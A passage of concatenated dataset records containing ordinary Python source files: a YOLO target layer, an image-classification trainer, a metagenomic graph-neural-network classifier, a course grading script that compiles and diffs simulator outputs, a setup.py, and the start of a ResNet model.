bb[2] - bb[0]\n hh = bb[3] - bb[1]\n cx = (bb[0] + bb[2]) / 2.0\n cy = (bb[1] + bb[3]) / 2.0\n\n ww *= np.sqrt(ratio)\n hh /= np.sqrt(ratio)\n\n res = bb.copy()\n res[0] = cx - ww * 0.5\n res[1] = cy - hh * 0.5\n res[2] = cx + ww * 0.5\n res[3] = cy + hh * 0.5\n return res\n\n\ndef _autofit_ratio(bb, max_ratio=3.0):\n #\n ww = bb[2] - bb[0]\n hh = bb[3] - bb[1]\n cx = (bb[0] + bb[2]) / 2.0\n cy = (bb[1] + bb[3]) / 2.0\n\n ratio = ww / hh\n if ratio > max_ratio:\n hh = ww / max_ratio\n elif ratio < 1.0 / max_ratio:\n ww = hh / max_ratio\n\n res = bb.copy()\n res[0] = cx - 
ww * 0.5\n res[1] = cy - hh * 0.5\n res[2] = cx + ww * 0.5\n res[3] = cy + hh * 0.5\n return res\n\n\n@mx.operator.register(\"yolo_target\")\nclass YoloTargetProp(mx.operator.CustomOpProp):\n def __init__(self, th_iou=0.5, th_iou_neg=0.4, th_iou_pass=0.25, variances=(0.1, 0.1, 0.2, 0.2)):\n #\n super(YoloTargetProp, self).__init__(need_top_grad=False)\n self.th_iou = float(th_iou)\n self.th_iou_neg = float(th_iou_neg)\n self.th_iou_pass = float(th_iou_pass)\n self.variances = literal_eval(str(variances))\n\n def list_arguments(self):\n return ['anchors', 'label', 'probs_cls']\n\n def list_outputs(self):\n return ['target_reg', 'mask_reg', 'target_cls', 'target_rpn']\n\n def infer_shape(self, in_shape):\n n_batch, n_class, n_sample = in_shape[2]\n\n target_reg_shape = (n_batch, n_sample, 4)\n mask_reg_shape = target_reg_shape\n target_cls_shape = (n_batch, 1, n_sample)\n\n out_shape = [target_reg_shape, mask_reg_shape, target_cls_shape, target_cls_shape]\n return in_shape, out_shape, []\n\n def create_operator(self, ctx, shapes, dtypes):\n return YoloTarget(self.th_iou, self.th_iou_neg, self.th_iou_pass, self.variances)\n","sub_path":"layer/yolo_target_layer.py","file_name":"yolo_target_layer.py","file_ext":"py","file_size_in_byte":8499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"564991590","text":"\"\"\"Classification trainer/evaluator implementation module.\"\"\"\nimport logging\n\nimport torch\nimport torch.optim\n\nimport thelper.utils\nfrom thelper.train.base import Trainer\n\nlogger = logging.getLogger(__name__)\n\n\nclass ImageClassifTrainer(Trainer):\n \"\"\"Trainer interface specialized for image classification.\n\n This class implements the abstract functions of :class:`thelper.train.base.Trainer` required to train/evaluate\n a model for image classification or recognition. It also provides a utility function for fetching i/o packets\n (images, class labels) from a sample, and that converts those into tensors for forwarding and loss estimation.\n\n .. 
seealso::\n | :class:`thelper.train.base.Trainer`\n \"\"\"\n\n def __init__(self, session_name, save_dir, model, task, loaders, config, ckptdata=None):\n \"\"\"Receives session parameters, parses image/label keys from task object, and sets up metrics.\"\"\"\n super().__init__(session_name, save_dir, model, task, loaders, config, ckptdata=ckptdata)\n if not isinstance(self.task, thelper.tasks.Classification):\n raise AssertionError(\"expected task to be classification\")\n metrics = list(self.train_metrics.values()) + list(self.valid_metrics.values()) + list(self.test_metrics.values())\n for metric in metrics: # check all metrics for classification-specific attributes, and set them\n if hasattr(metric, \"set_class_names\") and callable(metric.set_class_names):\n metric.set_class_names(self.task.class_names)\n self.warned_no_shuffling_augments = False\n\n def _to_tensor(self, sample):\n \"\"\"Fetches and returns tensors of input images and class labels from a batched sample dictionary.\"\"\"\n if not isinstance(sample, dict):\n raise AssertionError(\"trainer expects samples to come in dicts for key-based usage\")\n if self.task.input_key not in sample:\n raise AssertionError(\"could not find input key '%s' in sample dict\" % self.task.input_key)\n input_val, label_idx = sample[self.task.input_key], None\n if isinstance(input_val, list):\n if self.task.gt_key in sample and sample[self.task.gt_key] is not None:\n label = sample[self.task.gt_key]\n if not isinstance(label, list) or len(label) != len(input_val):\n raise AssertionError(\"label should also be a list of the same length as input\")\n label_idx = [None] * len(input_val)\n for idx in range(len(input_val)):\n input_val[idx], label_idx[idx] = self._to_tensor({self.task.input_key: input_val[idx],\n self.task.gt_key: label[idx]})\n else:\n for idx in range(len(input_val)):\n input_val[idx] = torch.FloatTensor(input_val[idx])\n else:\n input_val = torch.FloatTensor(input_val)\n if self.task.gt_key in sample and sample[self.task.gt_key] is not None:\n label = sample[self.task.gt_key]\n if isinstance(label, torch.Tensor) and label.numel() == input_val.shape[0] \\\n and label.dtype == torch.int64:\n label_idx = label # shortcut with less checks (dataset is already using tensor'd indices)\n else:\n label_idx = label_idx or list()\n for class_name in label:\n assert isinstance(class_name, (int, torch.Tensor, str)), \\\n \"expected label to be a name (string) or index (int)\"\n if isinstance(class_name, (int, torch.Tensor)):\n if isinstance(class_name, torch.Tensor):\n assert torch.numel(class_name) == 1, \"unexpected scalar label, got vector\"\n class_name = class_name.item()\n # dataset must already be using indices, we will forgive this...\n assert 0 <= class_name < len(self.task.class_names), \\\n \"class name given as out-of-range index (%d) for class list\" % class_name\n label_idx.append(class_name)\n else:\n assert class_name in self.task.class_names, \\\n \"got unexpected label '%s' for a sample (unknown class)\" % class_name\n label_idx.append(self.task.class_indices[class_name])\n label_idx = torch.LongTensor(label_idx)\n return input_val, label_idx\n\n def train_epoch(self, model, epoch, iter, dev, loss, optimizer, loader, metrics, monitor=None, writer=None):\n \"\"\"Trains the model for a single epoch using the provided objects.\n\n Args:\n model: the model to train that is already uploaded to the target device(s).\n epoch: the epoch index we are training for (0-based).\n iter: the iteration count at the start of the current 
epoch.\n dev: the target device that tensors should be uploaded to.\n loss: the loss function used to evaluate model fidelity.\n optimizer: the optimizer used for back propagation.\n loader: the data loader used to get transformed training samples.\n metrics: the list of metrics to evaluate after every iteration.\n monitor: name of the metric to update/monitor for improvements.\n writer: the writer used to store tbx events/messages/metrics.\n \"\"\"\n if not loss:\n raise AssertionError(\"missing loss function\")\n if not optimizer:\n raise AssertionError(\"missing optimizer\")\n if not loader:\n raise AssertionError(\"no available data to load\")\n if not isinstance(metrics, dict):\n raise AssertionError(\"expect metrics as dict object\")\n epoch_loss = 0\n epoch_size = len(loader)\n self.logger.debug(\"fetching data loader samples...\")\n for idx, sample in enumerate(loader):\n input_val, label = self._to_tensor(sample)\n if label is None:\n raise AssertionError(\"groundtruth required when training a model\")\n optimizer.zero_grad()\n if isinstance(input_val, list): # training samples got augmented, we need to backprop in multiple steps\n if not input_val:\n raise AssertionError(\"cannot train with empty post-augment sample lists\")\n if not isinstance(label, list) or len(label) != len(input_val):\n raise AssertionError(\"label should also be a list of the same length as input\")\n if not self.warned_no_shuffling_augments:\n self.logger.warning(\"using training augmentation without global shuffling, \"\n \"gradient steps might be affected\")\n # see the docstring of thelper.transforms.operations.Duplicator for more information\n self.warned_no_shuffling_augments = True\n iter_loss = None\n iter_pred = None\n augs_count = len(input_val)\n for input_idx in range(augs_count):\n aug_pred = model(self._move_tensor(input_val[input_idx], dev))\n aug_loss = loss(aug_pred, self._move_tensor(label[input_idx], dev))\n aug_loss.backward() # test backprop all at once? 
might not fit in memory...\n if iter_pred is None:\n iter_loss = aug_loss.clone().detach()\n iter_pred = aug_pred.clone().detach()\n else:\n iter_loss += aug_loss.detach()\n iter_pred = torch.cat((aug_pred.detach(), iter_pred), dim=0)\n iter_loss /= augs_count\n label = torch.cat(label, dim=0)\n else:\n iter_pred = model(self._move_tensor(input_val, dev))\n iter_loss = loss(iter_pred, self._move_tensor(label, dev))\n iter_loss.backward()\n optimizer.step()\n if metrics:\n meta = {key: sample[key] if key in sample else None\n for key in self.task.meta_keys} if self.task.meta_keys else None\n iter_pred_cpu = self._move_tensor(iter_pred, dev=\"cpu\", detach=True)\n label_cpu = self._move_tensor(label, dev=\"cpu\", detach=True)\n for metric in metrics.values():\n metric.accumulate(iter_pred_cpu, label_cpu, meta=meta)\n if self.train_iter_callback is not None:\n self.train_iter_callback(sample=sample, task=self.task, pred=iter_pred,\n iter_idx=iter, max_iters=epoch_size,\n epoch_idx=epoch, max_epochs=self.epochs,\n **self.callback_kwargs)\n epoch_loss += iter_loss.item()\n monitor_output = \"\"\n if monitor is not None and monitor in metrics:\n monitor_output = \" {}: {:.2f}\".format(monitor, metrics[monitor].eval())\n self.logger.info(\n \"train epoch#{} (iter#{}) batch: {}/{} ({:.0f}%) loss: {:.6f}{}\".format(\n epoch,\n iter,\n idx + 1,\n epoch_size,\n ((idx + 1) / epoch_size) * 100.0,\n iter_loss.item(),\n monitor_output\n )\n )\n if writer:\n writer.add_scalar(\"iter/loss\", iter_loss.item(), iter)\n for metric_name, metric in metrics.items():\n if metric.is_scalar(): # only useful assuming that scalar metrics are smoothed...\n writer.add_scalar(\"iter/%s\" % metric_name, metric.eval(), iter)\n iter += 1\n epoch_loss /= epoch_size\n return epoch_loss, iter\n\n def eval_epoch(self, model, epoch, dev, loader, metrics, monitor=None, writer=None):\n \"\"\"Evaluates the model using the provided objects.\n\n Args:\n model: the model to evaluate that is already uploaded to the target device(s).\n epoch: the epoch number we are evaluating for (0-based).\n dev: the target device that tensors should be uploaded to.\n loader: the data loader used to get transformed valid/test samples.\n metrics: the dictionary of metrics to update every iteration.\n monitor: name of the metric to update/monitor for improvements.\n writer: the writer used to store tbx events/messages/metrics.\n \"\"\"\n if not loader:\n raise AssertionError(\"no available data to load\")\n with torch.no_grad():\n epoch_size = len(loader)\n self.logger.debug(\"fetching data loader samples...\")\n for idx, sample in enumerate(loader):\n if idx < self.skip_eval_iter:\n continue # skip until previous iter count (if set externally; no effect otherwise)\n input_val, label = self._to_tensor(sample)\n if isinstance(input_val, list): # evaluation samples got augmented, we need to get the mean prediction\n if not input_val:\n raise AssertionError(\"cannot eval with empty post-augment sample lists\")\n if not isinstance(label, list) or len(label) != len(input_val):\n raise AssertionError(\"label should also be a list of the same length as input\")\n # this might be costly for nothing, we could remove the check and assume user is not dumb\n if any([not torch.eq(l, label[0]).all() for l in label]):\n raise AssertionError(\"all labels should be identical! 
(why do eval-time augment otherwise?)\")\n label = label[0] # since all identical, just pick the first one and pretend its the only one\n preds = None\n for input_idx in range(len(input_val)):\n pred = model(self._move_tensor(input_val[input_idx], dev))\n if preds is None:\n preds = torch.unsqueeze(pred.clone(), 0)\n else:\n preds = torch.cat((preds, torch.unsqueeze(pred, 0)), 0)\n pred = torch.mean(preds, dim=0)\n else:\n pred = model(self._move_tensor(input_val, dev))\n if metrics:\n meta = {key: sample[key] if key in sample else None\n for key in self.task.meta_keys} if self.task.meta_keys else None\n pred_cpu = self._move_tensor(pred, dev=\"cpu\", detach=True)\n label_cpu = self._move_tensor(label, dev=\"cpu\", detach=True)\n for metric in metrics.values():\n metric.accumulate(pred_cpu, label_cpu, meta=meta)\n if self.eval_iter_callback is not None:\n self.eval_iter_callback(sample=sample, task=self.task, pred=pred,\n iter_idx=idx, max_iters=epoch_size,\n epoch_idx=epoch, max_epochs=self.epochs,\n **self.callback_kwargs)\n self.logger.info(\n \"eval epoch#{} batch: {}/{} ({:.0f}%){}\".format(\n epoch,\n idx + 1,\n epoch_size,\n ((idx + 1) / epoch_size) * 100.0,\n \" {}: {:.2f}\".format(monitor, metrics[monitor].eval()) if monitor is not None else \"\"\n )\n )\n","sub_path":"thelper/train/classif.py","file_name":"classif.py","file_ext":"py","file_size_in_byte":13983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"445234299","text":"#!/usr/bin/python3\nfrom __future__ import division\nimport sys\nimport os\nimport subprocess\nimport csv\nimport operator\nimport time\nimport random\nimport argparse\nimport re\nimport logging\nimport os.path as osp\nfrom sys import stdout\n\nimport numpy as np\nimport pickle\nimport torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\n\nfrom Bio import SeqIO\nfrom igraph import *\nfrom collections import defaultdict\nfrom bidirectionalmap.bidirectionalmap import BidirectionalMap\n\nfrom torch_geometric.data import ClusterData, ClusterLoader\nfrom torch_geometric.data import DataLoader\nfrom torch_geometric.data import Data\nfrom torch_geometric.data import InMemoryDataset\n\nspecies_map = BidirectionalMap()\n\noverlap_file_name = \"species_with_readnames.graphml\"\n\ndef index_to_mask(index, size):\n mask = torch.zeros((size, ), dtype=torch.bool)\n mask[index] = 1\n return mask\n\ndef resize(l, newsize, filling=None):\n if newsize > len(l):\n l.extend([filling for x in range(len(l), newsize)])\n else:\n del l[newsize:]\n\ndef peek_line(f):\n pos = f.tell()\n line = f.readline()\n f.seek(pos)\n return line\n\ntetra_list = []\ndef compute_tetra_list():\n for a in ['A', 'C', 'T', 'G']:\n for b in ['A', 'C', 'T', 'G']:\n for c in ['A', 'C', 'T', 'G']:\n for d in ['A', 'C', 'T', 'G']:\n tetra_list.append(a+b+c+d)\n\ndef compute_tetra_freq(seq):\n tetra_cnt = []\n for tetra in tetra_list:\n tetra_cnt.append(seq.count(tetra))\n return tetra_cnt\n\ndef compute_gc_bias(seq):\n seqlist = list(seq)\n gc_cnt = seqlist.count('G') + seqlist.count('C')\n gc_frac = gc_cnt/len(seq)\n return gc_frac\n\ndef compute_contig_features(read_file, read_names):\n compute_tetra_list()\n gc_map = defaultdict(float) \n tetra_freq_map = defaultdict(list)\n idx = 0\n for record in SeqIO.parse(read_file, 'fastq'):\n if record.name in read_names:\n gc_map[record.name] = compute_gc_bias(record.seq)\n tetra_freq_map[record.name] = compute_tetra_freq(record.seq)\n stdout.write(\"\\r%d\" % idx)\n 
stdout.flush()\n idx += 1\n return gc_map, tetra_freq_map\n\ndef read_features(gc_bias_f, tf_f):\n gc_map = pickle.load(open(gc_bias_f, 'rb'))\n tetra_freq_map = pickle.load(open(tf_f, 'rb'))\n return gc_map, tetra_freq_map\n\ndef write_features(file_name, gc_map, tetra_freq_map):\n gc_bias_f = file_name + '.gc'\n tf_f = file_name + '.tf'\n pickle.dump(gc_map, open(gc_bias_f, 'wb'))\n pickle.dump(tetra_freq_map, open(tf_f, 'wb'))\n \ndef read_or_compute_features(file_name, read_names):\n gc_bias_f = file_name + '.gc'\n tf_f = file_name + '.tf'\n if not os.path.exists(gc_bias_f) and not os.path.exists(tf_f):\n gc_bias, tf = compute_contig_features(file_name, read_names)\n write_features(file_name, gc_bias, tf)\n else:\n gc_bias, tf = read_features(gc_bias_f, tf_f)\n return gc_bias, tf\n\n\ndef build_species_map(file_name):\n overlap_graph = Graph()\n overlap_graph = overlap_graph.Read_GraphML(file_name)\n overlap_graph.simplify(multiple=True, loops=True, combine_edges=None)\n \n species = []\n for v in overlap_graph.vs:\n species.append(v['species'])\n\n # prepare vertex labels\n species_set = set(species)\n idx = 0\n for s in species_set:\n species_map[s] = idx\n idx += 1\n\n\nclass Metagenomic(InMemoryDataset):\n r\"\"\" Assembly graph built over raw metagenomic data using spades.\n Nodes represent contigs and edges represent link between them.\n\n Args:\n root (string): Root directory where the dataset should be saved.\n name (string): The name of the dataset (:obj:`\"bacteria-10\"`).\n transform (callable, optional): A function/transform that takes in an\n :obj:`torch_geometric.data.Data` object and returns a transformed\n version. The data object will be transformed before every access.\n (default: :obj:`None`)\n pre_transform (callable, optional): A function/transform that takes in\n an :obj:`torch_geometric.data.Data` object and returns a\n transformed version. The data object will be transformed before\n being saved to disk. 
(default: :obj:`None`)\n \"\"\"\n def __init__(self, root, name, transform=None, pre_transform=None):\n self.name = name\n super(Metagenomic, self).__init__(root, transform, pre_transform)\n self.data, self.slices = torch.load(self.processed_paths[0])\n\n @property\n def raw_dir(self):\n return osp.join(self.root, self.name, 'raw')\n\n @property\n def processed_dir(self):\n return osp.join(self.root, self.name, 'processed')\n\n @property\n def raw_file_names(self):\n return ['species_with_readnames.graphml', 'shuffled_reads.fastq', 'species_all.graphml', 'species_training.graphml']\n # return ['minimap2.graphml', 'sampled.fq', 'species_all.graphml', 'species_training.graphml']\n\n @property\n def processed_file_names(self):\n return ['pyg_meta_graph.pt']\n\n def download(self):\n pass\n\n def process(self):\n overlap_graph_file = osp.join(self.raw_dir, self.raw_file_names[0])\n read_file = osp.join(self.raw_dir, self.raw_file_names[1])\n all_file = osp.join(self.raw_dir, self.raw_file_names[2])\n training_file = osp.join(self.raw_dir, self.raw_file_names[3])\n # Read assembly graph and node features from the file into arrays\n\n overlap_graph = Graph()\n overlap_graph = overlap_graph.Read_GraphML(overlap_graph_file)\n # overlap_graph = overlap_graph.clusters().subgraph(1)\n\n source_nodes = []\n dest_nodes = []\n # Add edges to the graph\n overlap_graph.simplify(multiple=True, loops=True, combine_edges=None)\n # overlap_graph.write_graphml(all_file)\n\n # prepare edge list\n for e in overlap_graph.get_edgelist():\n source_nodes.append(e[0])\n dest_nodes.append(e[1])\n\n node_count = overlap_graph.vcount()\n print(\"Nodes: \" + str(overlap_graph.vcount()))\n print(\"Edges: \" + str(overlap_graph.ecount()))\n clusters = overlap_graph.clusters()\n print(\"Clusters: \" + str(len(clusters)))\n\n # get all vertex names\n vertex_names = []\n vertexes = overlap_graph.vs\n for v in overlap_graph.vs:\n vertex_names.append(v['readname'])\n gc_map, tetra_freq_map = read_or_compute_features(read_file, vertex_names)\n\n # prepare node features\n node_gc = []\n node_tfq = []\n for v in overlap_graph.vs:\n node_gc.append(gc_map[v['readname']])\n node_tfq.append(tetra_freq_map[v['readname']])\n\n # prepare vertex labels\n node_labels = []\n for v in overlap_graph.vs:\n node_labels.append(species_map[v['species']])\n \n # prepare torch objects\n x = torch.tensor(node_tfq, dtype=torch.float)\n g = torch.tensor(node_gc, dtype=torch.float)\n y = torch.tensor(node_labels, dtype=torch.float)\n n = torch.tensor(list(range(0, node_count)), dtype=torch.int)\n edge_index = torch.tensor([source_nodes, dest_nodes], dtype=torch.long)\n\n # prepare train/validate/test vectors\n # train_size = int(node_count/3)\n # val_size = train_size\n # train_index = torch.arange(train_size)\n # val_index = torch.arange(train_size, train_size+val_size)\n # test_index = torch.arange(train_size+val_size, node_count)\n # train_mask = index_to_mask(train_index, size=node_count)\n # val_mask = index_to_mask(val_index, size=node_count)\n # test_mask = index_to_mask(test_index, size=node_count)\n \n train_size = int(node_count/3)\n val_size = int(node_count/3)\n \n all_indexes = [i for i in range(node_count)]\n random.shuffle(all_indexes)\n train_index = all_indexes[0:train_size]\n val_index = all_indexes[train_size:train_size+val_size]\n test_index = all_indexes[train_size+val_size:]\n \n train_mask = index_to_mask(train_index, size=node_count)\n val_mask = index_to_mask(val_index, size=node_count)\n test_mask = index_to_mask(test_index, 
size=node_count)\n\n training_graph = overlap_graph\n vertex_set = training_graph.vs\n for i in range(node_count):\n if test_mask[i]:\n vertex_set[i]['species'] = 'Unknown'\n training_graph.write_graphml(training_file)\n learned_graph = training_graph\n\n data = Data(x=x, edge_index=edge_index, y=y, g=g, n=n)\n data.train_mask = train_mask\n data.val_mask = val_mask\n data.test_mask = test_mask\n data_list = []\n data_list.append(data)\n\n data, slices = self.collate(data_list)\n torch.save((data, slices), self.processed_paths[0])\n\n def __repr__(self):\n return '{}()'.format(self.name)\n\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = GCNConv(dataset.num_features, 128, cached=False)\n self.conv2 = GCNConv(128, int(dataset.num_classes), cached=False)\n\n self.reg_params = self.conv1.parameters()\n self.non_reg_params = self.conv2.parameters()\n\n def forward(self, data):\n x, edge_index = data.x.float(), data.edge_index\n x = F.relu(self.conv1(x, edge_index))\n x = F.dropout(x, training=self.training)\n x = self.conv2(x, edge_index)\n return F.log_softmax(x, dim=1)\n\ndef train():\n model.train()\n total_loss = total_examples = 0\n for data in loader:\n data = data.to(device)\n optimizer.zero_grad()\n out = model(data)\n loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask].long(), reduction='none')\n loss.mean().backward()\n optimizer.step()\n total_loss += loss.mean().item() * data.num_nodes\n total_examples += data.num_nodes\n return total_loss / total_examples\n\n@torch.no_grad()\ndef test():\n model.eval()\n for data in loader:\n data = data.to(device)\n logits, accs = model(data), []\n for _, mask in data('train_mask', 'val_mask', 'test_mask'):\n _, pred = logits[mask].max(1)\n acc = pred.eq(data.y[mask]).sum().item() / mask.sum().item()\n accs.append(acc)\n\n return accs\n\n@torch.no_grad()\ndef output(output_dir, input_dir, data_name):\n overlap_graph_file = input_dir + '/' + data_name + '/raw/' + overlap_file_name\n for data in loader:\n data = data.to(device)\n _, preds = model(data).max(dim=1)\n acc = preds.eq(data.y).sum().item() / len(data.y)\n print(acc)\n learned_graph = Graph()\n learned_graph = learned_graph.Read_GraphML(overlap_graph_file)\n rev_species_map = species_map.inverse\n vertex_set = learned_graph.vs\n miss_pred_vertices = []\n print(data)\n perm = data.n.tolist()\n orgs = data.y.tolist()\n preds = preds.tolist()\n train = data.train_mask.tolist()\n # annotate graph\n for idx,org,pred,t in zip(perm,orgs,preds,train):\n if pred == org:\n vertex_set[idx]['pred'] = 'Correct'\n else:\n vertex_set[idx]['pred'] = 'Wrong'\n if t == 1:\n vertex_set[idx]['train'] = 'True'\n vertex_set[idx]['species'] = rev_species_map[org] \n else:\n vertex_set[idx]['train'] = 'False'\n vertex_set[idx]['species'] = rev_species_map[pred] \n # learned_file = output_dir + '/species_learned.graphml'\n # learned_graph.write_graphml(learned_file)\n \n t_idx_list = []\n for s in species_map:\n for v in vertex_set:\n if v['species'] == s:\n t_idx_list.append(v.index)\n break\n\n # print a subgraph\n edge_set = set()\n for idx in t_idx_list:\n bfsiter = learned_graph.bfsiter(vertex_set[idx], OUT, True)\n for v in bfsiter:\n if v[1] < 3: \n if v[1] > 0:\n edge_set.add(learned_graph.get_eid(v[2].index, v[0].index))\n # subvertex_set.add(v[2].index)\n # subvertex_set.add(v[0].index)\n\n subedge_list = list(edge_set)\n subgraph = learned_graph.subgraph_edges(subedge_list)\n print(subgraph.vcount())\n print(subgraph.ecount())\n # 
subvertex_list = list(subvertex_set)\n # subgraph = learned_graph.subgraph(subvertex_list)\n subgraph_file = output_dir + '/species_subgraph.graphml'\n subgraph.write_graphml(subgraph_file)\n\n# Sample command\n# -------------------------------------------------------------------\n# python meta_gnn.py --input /path/to/raw_files\n# --name /name/of/dataset\n# --output /path/to/output_folder\n# -------------------------------------------------------------------\n\n# Setup logger\n#-----------------------\n\nlogger = logging.getLogger('MetaGNN 1.0')\nlogger.setLevel(logging.INFO)\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nconsoleHeader = logging.StreamHandler()\nconsoleHeader.setFormatter(formatter)\nlogger.addHandler(consoleHeader)\n\nstart_time = time.time()\n\nap = argparse.ArgumentParser()\n\nap.add_argument(\"-i\", \"--input\", required=True, help=\"path to the input files\")\nap.add_argument(\"-n\", \"--name\", required=True, help=\"name of the dataset\")\nap.add_argument(\"-o\", \"--output\", required=True, help=\"output directory\")\n\nargs = vars(ap.parse_args())\n\ninput_dir = args[\"input\"]\ndata_name = args[\"name\"]\noutput_dir = args[\"output\"]\n\n# Setup output path for log file\n#---------------------------------------------------\n\nfileHandler = logging.FileHandler(output_dir+\"/\"+\"metagnn.log\")\nfileHandler.setLevel(logging.INFO)\nfileHandler.setFormatter(formatter)\nlogger.addHandler(fileHandler)\n\nlogger.info(\"Welcome to MetaGNN: Metagenomic reads classification using GNN.\")\nlogger.info(\"This version of MetaGNN makes use of the overlap graph produced by Minimap2.\")\n\nlogger.info(\"Input arguments:\")\nlogger.info(\"Input dir: \"+input_dir)\nlogger.info(\"Dataset: \"+data_name)\n\nlogger.info(\"MetaGNN started\")\n\nlogger.info(\"Constructing the overlap graph and node feature vectors\")\n\nbuild_species_map(osp.join(input_dir, data_name, 'raw', overlap_file_name))\ndataset = Metagenomic(root=input_dir, name=data_name)\ndata = dataset[0]\nprint(data)\n\n#exit()\nlogger.info(\"Graph construction done!\")\nelapsed_time = time.time() - start_time\nlogger.info(\"Elapsed time: \"+str(elapsed_time)+\" seconds\")\n\n#cluster_data = ClusterData(data, num_parts=100, recursive=False, save_dir=dataset.processed_dir)\n\n#loader = ClusterLoader(cluster_data, batch_size=128, shuffle=False, num_workers=5)\n\nloader = DataLoader(dataset, batch_size=512, shuffle=True)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nlogger.info(\"Running GNN on: \"+str(device))\nmodel = Net().to(device)\n\noptimizer = torch.optim.Adam([\n dict(params=model.reg_params, weight_decay=5e-4),\n dict(params=model.non_reg_params, weight_decay=0)\n], lr=0.01)\n\nlogger.info(\"Training model\")\nbest_val_acc = test_acc = 0\nfor epoch in range(1, 50):\n train()\n train_acc, val_acc, tmp_test_acc = test()\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n test_acc = tmp_test_acc\n log = 'Epoch: {:03d}, Train: {:.4f}, Val: {:.4f}, Test: {:.4f}'\n logger.info(log.format(epoch, train_acc, best_val_acc, test_acc))\nelapsed_time = time.time() - start_time\n# Print elapsed time for the process\nlogger.info(\"Elapsed time: \"+str(elapsed_time)+\" seconds\")\n\n#Print GCN model output\noutput(output_dir, input_dir, data_name)\n\n","sub_path":"src/meta_gnn_overlap.py","file_name":"meta_gnn_overlap.py","file_ext":"py","file_size_in_byte":15863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"329397540","text":"import os\nimport subprocess\nPATH_VALID =\"/home/master/gcking/test/archiTA/Student_valid_testcase\"\nPATH_STUDENT =\"/home/master/gcking/test/archiTA/Student_project1\"\nPATH_TA\t\t =\"/home/master/gcking/test/archiTA/TA_project1\"\n\nFILE = open('valid_check.csv','w')\n\nfor line in open('folder_check.csv','r'):\n\tline = line.split(',')\n\tif(line[1] == \"OK\\n\"):\n\t\t#execute student's\n\t\tos.chdir(PATH_STUDENT+'/'+line[0]+'/simulator')\n\t\tos.system('make clean')\t\t\n\t\tos.system('make')\t\t\n\t\tos.system('cp ../testcase/iimage.bin .')\n\t\tos.system('cp ../testcase/dimage.bin .')\n\t\tos.system('./single_cycle')\n\t\t#execute TA's\n\t\tos.chdir(PATH_TA)\n\t\tos.system('cp '+PATH_STUDENT+'/'+line[0]+'/testcase/iimage.bin .')\n\t\tos.system('cp '+PATH_STUDENT+'/'+line[0]+'/testcase/dimage.bin .')\n\t\terr_msg = subprocess.getoutput('./single_cycle')\n\t\tspt_diff = subprocess.getoutput('diff '+PATH_STUDENT+'/'+line[0]+'/simulator/snapshot.rpt snapshot.rpt')\n\t\terr_diff = subprocess.getoutput('diff '+PATH_STUDENT+'/'+line[0]+'/simulator/error_dump.rpt error_dump.rpt')\n\t\t#valid?\n\t\tif(err_msg == \"\" and spt_diff == \"\" and err_diff == \"\"):\n\t\t\tFILE.write(line[0]+','+'1\\n')\n\t\t\tos.chdir(PATH_VALID)\n\t\t\tos.system('mkdir '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/iimage.bin '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/dimage.bin '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/snapshot.rpt '+line[0])\n\t\t\tos.system('cp '+PATH_TA+'/error_dump.rpt '+line[0])\n\t\telse:\n\t\t\tFILE.write(line[0]+','+'0\\n')\n\telse:\n\t\tFILE.write(line[0]+','+'0\\n')\n\t\t\n","sub_path":"archiTA_dev/2_2nd_check_testcase.py","file_name":"2_2nd_check_testcase.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"523284614","text":"from setuptools import setup, find_packages\n\ninstall_requires = [\n    \"surprise\",\n    \"numpy\",\n    \"pandas\",\n    \"scikit-learn\",\n    \"tqdm\",\n    \"user_agent\",\n    \"bs4\",\n    \"requests\",\n    \"lxml\",\n    \"streamlit\",\n    \"unidecode\",\n]\n\ndev_requires = [\n    \"autopep8\",\n    \"pytest\",\n    \"pytest-cov\",\n    \"mock\",\n    \"pytest-mock\",\n    \"pytest-timeout\",\n    \"twine\",\n    \"coverage-badge\",\n    \"semver\",\n    \"flake8\",\n    \"pylint\",\n    \"moto\"\n]\nsetup(\n    name='rssenscritique',\n    version=\"1.0.0\",\n    description='recommends movies to you',\n    author='Louis Giron',\n    license='',\n    packages=find_packages(exclude=[\"tests\"]),\n    install_requires=install_requires,\n    include_package_data=True,\n    extras_require={\"dev\": dev_requires}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"190802519","text":"'''\nResNet-based model to map an image from pixel space to a feature space.\nIt needs to be pretrained on the dataset.\n\nThe code is based on\n@article{\nzhang2018mixup,\ntitle={mixup: Beyond Empirical Risk Minimization},\nauthor={Hongyi Zhang, Moustapha Cisse, Yann N. 
Dauphin, David Lopez-Paz},\njournal={International Conference on Learning Representations},\nyear={2018},\nurl={https://openreview.net/forum?id=r1Ddp1-Rb},\n}\n'''\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\n\nIMG_SIZE=128\nNC=3\nresize=(128,128)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x):\n out = 